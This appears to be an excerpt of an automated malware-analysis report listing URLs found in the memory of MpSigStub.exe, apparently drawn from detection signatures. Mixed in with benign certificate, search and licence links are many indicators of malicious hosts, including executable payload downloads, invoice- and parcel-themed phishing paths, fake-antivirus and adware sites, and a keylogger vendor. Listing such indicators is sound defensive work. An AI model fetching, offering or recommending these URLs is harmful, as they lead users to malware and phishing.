Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.airmak.it/information.rar
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.ajanster.com/zuppe/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.al-enayah.com/ssfm
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp String found in binary or memory: http://www.alanga.net/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.aldimarche.eu/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://www.alfa-search.com/home.html
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://www.alfa-search.com/search.html
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.allatori.com
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.alot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.alphadecimal.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.altayusa.com/ssl/js/prototype.js
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.alxup.com/bin/Up.ini
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.amentosx.com/script/r.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.andrewkarpie.com/sweat/secure/serve.php?protect=noefort)
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.antivirusxp2008.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/license-
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.appkyc6666.cn
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://www.applicablebeam.com/ddawdew/trjgje.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.ardamax.com/keylogger/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://www.arfa.it/rechnung/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.asame.org/includes/js/dtree/img/474/mamb/pdf/pdf.htm)
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.asianraw.com/members/vs.html
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://www.ateliedeervas.com.br/scan/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.html
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp String found in binary or memory: http://www.avpro-labs.com/buy.htmlx
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://www.badu.cc
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/baidu?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.cn/s?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/baidu?tn=
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/cpro.php?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.bin32.com/check?id=1&ver=16
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://www.bitly.com/yeuiqwbdhasdvbhsagdhj%public%
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.blazehits.net/popup.
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.bliao.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.blizzard.com/support/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.blue-series.de
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.bluelook.es/bvvtbbh.php
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://www.bobozim.hpg.com.br/nohot.jpg
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.bokee.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/install/inst64.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.bonusesfound.ml/update/index.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://www.bookiq.bsnl.co.in/data_entry/circulars/m
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://www.boot-land.net/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.boukan.8m.net/AYO_Soft/Index.html
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.britishtotty.com/content/homepage.html
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.browserwise.com/d
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.cakedan.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/install.php?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.cashon.co.kr/search/search.phpx
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://www.ccleaner.com
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.ccnnic.com/download/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
Source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.cheathappens.com/unauthorized/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://www.chmeditor.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.ckplayer.comutf-8
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.cleveradds.com/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.cmbchina.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.cmfu.com/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.coapr13south.com/download.php?xe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://www.codylindley.com)
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cojulyfastdl.com/download.php?x
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cojune13coast.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.comar13west.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.comay13north.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.comay15coat.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: http://www.comegoto.com/host.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.com
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: http://www.comfm.comx;
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://www.commonname.com/find.asp?cn=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://www.constructed.fi/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://www.consumerinput.com/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://www.consumerinput.com/xb
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cooct13hen.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cooctdlfast.com/download.php?x
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.copy9.com
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept13jetty.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.davion.plus.com/iscyqz.html
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.elec-tb.com/tmp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/9.doc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: http://www.g00gleadserver.com/list.txt
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://www.getip.pw
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
